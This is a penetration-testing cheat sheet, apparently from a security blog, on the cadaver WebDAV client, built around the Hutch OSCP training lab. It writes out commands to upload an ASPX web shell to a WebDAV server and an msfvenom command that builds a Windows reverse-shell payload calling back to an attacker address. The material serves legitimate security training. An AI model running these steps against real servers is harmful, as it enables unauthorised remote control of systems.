ToolsFebruary 9, 20262 min readby 0xt0pus

Cadaver

WebDAV client for uploading and managing files on WebDAV-enabled servers

#webdav#web#file-upload

cadaver

Description

cadaver is a command-line WebDAV client used for uploading and managing files on WebDAV-enabled servers. It is commonly used during penetration testing to upload web shells to servers that have WebDAV enabled, such as Microsoft IIS servers with WebDAV support.

Usage 1: Connect to a WebDAV Server

Connect to a WebDAV-enabled web server interactively using cadaver. Authentication credentials will be prompted.

Command:

cadaver http://192.168.120.108

Usage 2: Upload a Web Shell via WebDAV

After connecting with cadaver, upload an ASPX web shell to the WebDAV server to gain command execution.

Command:

put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx

Usage 3: Verify WebDAV is Enabled (Pre-check with curl)

Before using cadaver, verify that WebDAV is enabled on the target server using curl OPTIONS request.

Command:

curl -X OPTIONS http://192.168.153.122 -v

Expected Output Indicating WebDAV:

DAV: 1,2,3
< MS-Author-Via: DAV

Full Attack Workflow (from Hutch OSCP Lab)

  1. Verify WebDAV is enabled:
curl -X OPTIONS http://192.168.153.122 -v
  1. Connect to WebDAV with cadaver:
cadaver http://192.168.120.108
  1. Upload ASPX web shell:
put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx
  1. Access the web shell in browser:
http://hutch.offsec/cmdasp.aspx
  1. Generate a reverse shell payload and upload it for a fully upgraded shell:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.187 LPORT=445 -f exe -o shell.exe

Notes

  • cadaver is pre-installed on Kali Linux
  • Commonly used against Microsoft IIS servers with WebDAV enabled
  • Supports standard WebDAV operations: PUT, GET, DELETE, MKCOL, COPY, MOVE
  • Pair with Nmap's http-webdav-scan script to detect WebDAV during enumeration
  • Web shells commonly used: cmdasp.aspx (for IIS/ASP.NET targets)